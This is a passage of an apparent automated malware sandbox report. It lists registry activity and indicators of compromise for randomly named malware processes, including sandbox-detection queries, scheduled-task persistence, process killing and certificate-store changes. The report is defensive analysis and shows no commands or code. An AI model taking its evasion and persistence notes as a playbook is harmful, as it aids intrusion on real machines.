\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ WerFault.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0003 WerFault.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8E7A.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI aeghugg Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 WerFault.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service WerFault.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8E7A.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI HcY5k_KrNgbxj3FPdJLM6vgP.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI HcY5k_KrNgbxj3FPdJLM6vgP.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ctghugg Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI aeghugg -
Checks processor information in registry 2 TTPs 13 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
30m_VqBd5yyKL_Q269RMiiX0.exeD2B.exebuild2.exesvchost.exeforfiles.exenRYNXU8kXWDM9ct7FinhQA1L.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 30m_VqBd5yyKL_Q269RMiiX0.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 D2B.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature forfiles.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision forfiles.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString nRYNXU8kXWDM9ct7FinhQA1L.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 30m_VqBd5yyKL_Q269RMiiX0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build2.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 forfiles.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nRYNXU8kXWDM9ct7FinhQA1L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString D2B.exe -
Creates scheduled task(s) 1 TTPs 27 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 11060 schtasks.exe 17248 schtasks.exe 11580 schtasks.exe 13328 schtasks.exe 12348 schtasks.exe 6480 schtasks.exe 13592 schtasks.exe 9908 schtasks.exe 10996 schtasks.exe 8936 schtasks.exe 17252 schtasks.exe 2768 schtasks.exe 8720 schtasks.exe 16940 schtasks.exe 13200 schtasks.exe 13036 schtasks.exe 13212 schtasks.exe 7504 schtasks.exe 12112 schtasks.exe 9916 schtasks.exe 10672 schtasks.exe 13932 schtasks.exe 11260 schtasks.exe 6160 schtasks.exe 11936 schtasks.exe 8596 schtasks.exe 6952 schtasks.exe -
Delays execution with timeout.exe 6 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 10608 timeout.exe 16752 timeout.exe 17592 timeout.exe 18944 timeout.exe 12440 timeout.exe 9484 timeout.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
Processes:
Install.exechrome.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Kills process with taskkill 11 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 12316 taskkill.exe 13008 taskkill.exe 8644 taskkill.exe 11152 taskkill.exe 11216 taskkill.exe 10552 taskkill.exe 13352 taskkill.exe 6096 taskkill.exe 9724 taskkill.exe 9312 taskkill.exe 11080 taskkill.exe -
Processes:
MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exebrowser_broker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
WerFault.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeLzmwAqmV.exepowershell.exepowershell.exepowershell.exesvchost.exepowershell.exepowershell.exe59vTTgxQkNQc5rmC6nQhRefv.exepowershell.exepowershell.exepowershell.exepowershell.exemsiexec.exekvXppC1RJ_LmP970tG_k_8kU.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WerFault.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" 59vTTgxQkNQc5rmC6nQhRefv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" LzmwAqmV.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 msiexec.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates kvXppC1RJ_LmP970tG_k_8kU.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 kvXppC1RJ_LmP970tG_k_8kU.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs 59vTTgxQkNQc5rmC6nQhRefv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs kvXppC1RJ_LmP970tG_k_8kU.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" LzmwAqmV.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exemsiexec.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 5f3fe4a241abd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{THWC794Y-FI2R-S1WY-Z6CW-JHPFT080JY70}\650478DC7424C37C svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\ MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "338592514" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = b9d9ec28329fd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 0000000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{LJDG576V-FJ1Y-M3DK-T0ZJ-KIMQL256VU13} svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{THWC794Y-FI2R-S1WY-Z6CW-JHPFT080JY70}\7289246C77593EBF svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{THWC794Y-FI2R-S1WY-Z6CW-JHPFT080JY70}\650478DC7424C37C\2 = "1" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" MicrosoftEdge.exe Set value (data) 